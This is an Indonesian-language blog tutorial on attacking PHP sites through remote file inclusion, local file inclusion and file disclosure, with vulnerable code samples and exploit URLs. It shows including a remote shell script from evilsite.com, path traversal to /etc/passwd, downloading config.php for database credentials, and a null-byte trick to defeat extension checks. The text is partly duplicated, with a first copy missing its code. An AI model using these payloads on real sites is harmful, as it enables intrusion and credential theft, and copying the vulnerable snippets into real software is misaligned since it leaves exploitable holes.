1. Remote File Inclusion
contoh script :
misal :
itu artinya isi dari index.php bakal di eksekusi kedalem get.php
phpshellcode : http://evilsite.com/evilscript.txt
exploitasi :
kita masukkin php shell code ke dalem get.php
caranya tinggal ubah index.php jadi URL phpshellcode kita.
kalo kita masukkin URL phpshellcode kita, nanti script akan berubah sementara jadi :
kadang ada script yang berisi :
jadi semisal kita include http://evilsite.com/evilscript.txt kita, bakal berubah URL-nya jadi http://evilsite.com/evilscript.txt.php
untuk menghilangkan .php di akhir URL shellcode kita, bisa kita tambah NULLBYTE ( ).
2. Local File Inclusion
contoh script :
sama kayak RFI. cuman kalo ini hanya berlaku buat include file di 1 server.
misal :
bisa juga kita pake NULLBYTE buat bypass.. sama kayak RFI.
3. Local File Disclosure/Download
contoh script :
kesalahan itu bisa dimanfaatkan untuk mendownload file sensitif seperti konfigurasi database.
misal :
CONTOH DALAM GAMBAR NEEEHHH!!!
isi vulnerable file..
![[Image: 1lfifile.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_usF0wUrhKKFFVOHyawdRdydlKqaWsS1U9qXZwWLjKb2A0_uJzeMaLcGR-juG4IMMRwGTGThJksGNL2sZSoQSnT_yuGzHQrlf1tRxPsIzJuy7RzVVG2OP0=s0-d)
berikut isi file yang mau kita eksekusi..
![[Image: 2isitext.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vkYL6oUiLfjjpp6QCkn6LZPyzoqj4LEr2FEx3MbDhnEQIn6Gt6QVNN49KBBNFjdWxzOYZzBkZnDqfQ1lakeE2Y2nB_YhV2XTlio6JmCgvPbbZb_briNPI=s0-d)
berikut gambar file yang ter-eksekusi..
![[Image: 3executed.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uUlEV_DmQnFg2JIOuGIds-zEhbmXoITXAQuCgdUVEBiS9OQ58WI__dvW377faG-f6LUz8JmFx03LZhTd31_cGsMu-XqbvgfI8Cqhj8KJ6xwXCXBLAJ-uq5=s0-d)
berikut contoh pesan error LFI..
![[Image: 5gagallfi.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_skSvLtyzA4LVdsyfFSWeazt5-ZnDqRRRqkR0pI5GrsMYAuP8hReAxcVFZwLEG-1O2X3xBBaydmuZHyjfFEQ92caC7CMbM-_1hQn_U2yQvS3ai1dPCNHy0U=s0-d)
berikut contoh pesan error RFI
![[Image: 4errorrfi.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sWg9Cv5qb1YihFHxDEC7-ZJ1WoFbUyOGS8zN_OgNYZjk3xr6cpQIj1kGipFtQBRpIx_h4z262NgzIQvY9hKDCB2VFVSbrFRCujyl3fOq7NA6IPTzWG-EZI=s0-d)
RFI gagal karena setting allow_url_include di php.ini OFF..
![[Image: 6phpini.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t_LA86a0U-zRkXQlBiqEFB4q68mo8HVRDW_EO3mhZwZxVIIAG1tPjNcb0fz4MyBxlYjv-9zkdvboaYi1tMQ8ZxDtz0GQcIm9NmEY5KhLFqwZ1PKuWsSg=s0-d)
SEKIAN
contoh script :
Code:
<?php $page=$_GET['file'];
include($page);
?>misal :
Code:
http://www.sh4dhckr.com/get.php?file=index.phpphpshellcode : http://evilsite.com/evilscript.txt
exploitasi :
kita masukkin php shell code ke dalem get.php
caranya tinggal ubah index.php jadi URL phpshellcode kita.
Code:
http://www.sh4dhckr.com/get.php?file=http://evilsite.com/evilscript.txtkalo kita masukkin URL phpshellcode kita, nanti script akan berubah sementara jadi :
Code:
<?php $page="http://evilsite.com/evilscript.txt";
include($page);
?>kadang ada script yang berisi :
Code:
<?php
$page=$_GET['page'];
include($page.'.php');
?>jadi semisal kita include http://evilsite.com/evilscript.txt kita, bakal berubah URL-nya jadi http://evilsite.com/evilscript.txt.php
untuk menghilangkan .php di akhir URL shellcode kita, bisa kita tambah NULLBYTE ( ).
Code:
http://www.sh4dhckr.com/get.php?file=http://evilsite.com/evilscript.txt2. Local File Inclusion
contoh script :
Code:
<?php
$page=$_GET['page'];
include('/pages/'.$page);
?>sama kayak RFI. cuman kalo ini hanya berlaku buat include file di 1 server.
misal :
Code:
http://www.sh4dhckr.com/get.php?file=../../../../../../../../../../etc/passwdbisa juga kita pake NULLBYTE buat bypass.. sama kayak RFI.
3. Local File Disclosure/Download
contoh script :
Code:
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
die();kesalahan itu bisa dimanfaatkan untuk mendownload file sensitif seperti konfigurasi database.
misal :
Code:
http://www.sh4dhckr.com/get.php?file=includes/config.phpCONTOH DALAM GAMBAR NEEEHHH!!!
isi vulnerable file..
berikut isi file yang mau kita eksekusi..
berikut gambar file yang ter-eksekusi..
berikut contoh pesan error LFI..
berikut contoh pesan error RFI
RFI gagal karena setting allow_url_include di php.ini OFF..
SEKIAN

Posting Komentar